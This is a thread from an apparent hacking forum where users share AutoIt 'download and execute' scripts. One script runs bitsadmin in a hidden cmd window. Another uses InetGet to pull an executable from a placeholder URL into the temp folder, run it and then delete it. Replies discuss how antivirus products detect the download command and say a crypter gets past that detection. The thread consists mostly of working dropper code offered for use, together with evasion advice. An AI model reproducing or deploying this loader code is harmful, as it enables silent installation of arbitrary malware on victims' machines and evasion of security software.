• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

AutoIT DownLoad And Execute File

Status
Not open for further replies.

SP

Leech #800000
Shadow
User
Joined
Oct 23, 2011
Messages
230
Reputation
0
Reaction score
602
Points
93
Credits
0
‎13 Years of Service‎
77%
Code:
>;=================================================================================
; Func Alternative DownLoad And Ejecute File
; Author : M3
; Usage : sDownload( URL + ext '.exe' , FullPathName to Download
; Suport  XP Sp2 Sp3 | Vista | W7
; http://msdn.microsoft.com/en-us/library/windows/desktop/aa362813(v=vs.85).aspx
;=================================================================================
Func sDownload($sUrl , $Path)

Local $sCmd , $sParameter , $Flag , $sWorkdir , $Verb
$sCmd = 'cmd.exe'
$sParameter = ' /c "bitsadmin /transfer myjob /download /priority High '
$Flag = @SW_HIDE
ShellExecuteWait($sCmd , $sParameter & $sUrl & ' ' & $Path & ' ' , $sWorkdir , $Verb , $Flag)
Run($Path)
Exit

Endfunc
 
Re: DownLoad And Execute File

how to use this will u explain more
read the comments in the script.

Usage : sDownload( URL + ext '.exe' , FullPathName)

 
Re: DownLoad And Execute File

And another script for the same thing but better understanding !!

Code:
>
;=================================================================================
; Function DownLoad And Execute File
; Author : revengerix ( lol...certainly some good coder like Trancexx...)
; Usage : $UrlDownloader( URL + your.exe with " at the end , FullPathName to Download
;         $Directory ( @TempDir or @AppDataDir  & "\ yourFile.exe"
; Support  XP Sp2 Sp3 | Vista | W7 and w8
;=================================================================================

If FileExists (@TempDir & "\ yourFile.exe") Then
       FileDelete (@TempDir & "\ yourFile.exe")
EndIf
Sleep (1000)
$UrlDownloader = "http://YourDirectDownload.com/yourFile.exe"
$Directory = @TempDir  & "\ yourFile.exe"
InetGet ($UrlDownloader, $Directory)
Run ($Directory)
Sleep (5000)
FileDelete (@TempDir & "\ yourFile.exe")
 
Re: DownLoad And Execute File

And another script for the same thing but better understanding !!

Code:
>
;=================================================================================
; Function DownLoad And Execute File
; Author : revengerix ( lol...certainly some good coder like Trancexx...)
; Usage : $UrlDownloader( URL + your.exe with " at the end , FullPathName to Download
;         $Directory ( @TempDir or @AppDataDir  & "\ yourFile.exe"
; Support  XP Sp2 Sp3 | Vista | W7 and w8
;=================================================================================

If FileExists (@TempDir & "\ yourFile.exe") Then
       FileDelete (@TempDir & "\ yourFile.exe")
EndIf
Sleep (1000)
$UrlDownloader = "http://YourDirectDownload.com/yourFile.exe"
$Directory = @TempDir  & "\ yourFile.exe"
InetGet ($UrlDownloader, $Directory)
Run ($Directory)
Sleep (5000)
FileDelete (@TempDir & "\ yourFile.exe")
Problem is that inget command is detected by tons of AVs so u can use that !!

 
Please note, if you want to make a deal with this user, that it is blocked.
Re: DownLoad And Execute File

And another script for the same thing but better understanding !!

Code:
>
;=================================================================================
; Function DownLoad And Execute File
; Author : revengerix ( lol...certainly some good coder like Trancexx...)
; Usage : $UrlDownloader( URL + your.exe with " at the end , FullPathName to Download
;         $Directory ( @TempDir or @AppDataDir  & "\ yourFile.exe"
; Support  XP Sp2 Sp3 | Vista | W7 and w8
;=================================================================================

If FileExists (@TempDir & "\ yourFile.exe") Then
       FileDelete (@TempDir & "\ yourFile.exe")
EndIf
Sleep (1000)
$UrlDownloader = "http://YourDirectDownload.com/yourFile.exe"
$Directory = @TempDir  & "\ yourFile.exe"
InetGet ($UrlDownloader, $Directory)
Run ($Directory)
Sleep (5000)
FileDelete (@TempDir & "\ yourFile.exe")

El comando inget es lo mas detectable , pero de todos modos se bypassea con un crypter como la gente , de todos modos es un lindo codder dR.fAn0

 
Status
Not open for further replies.
Back
Top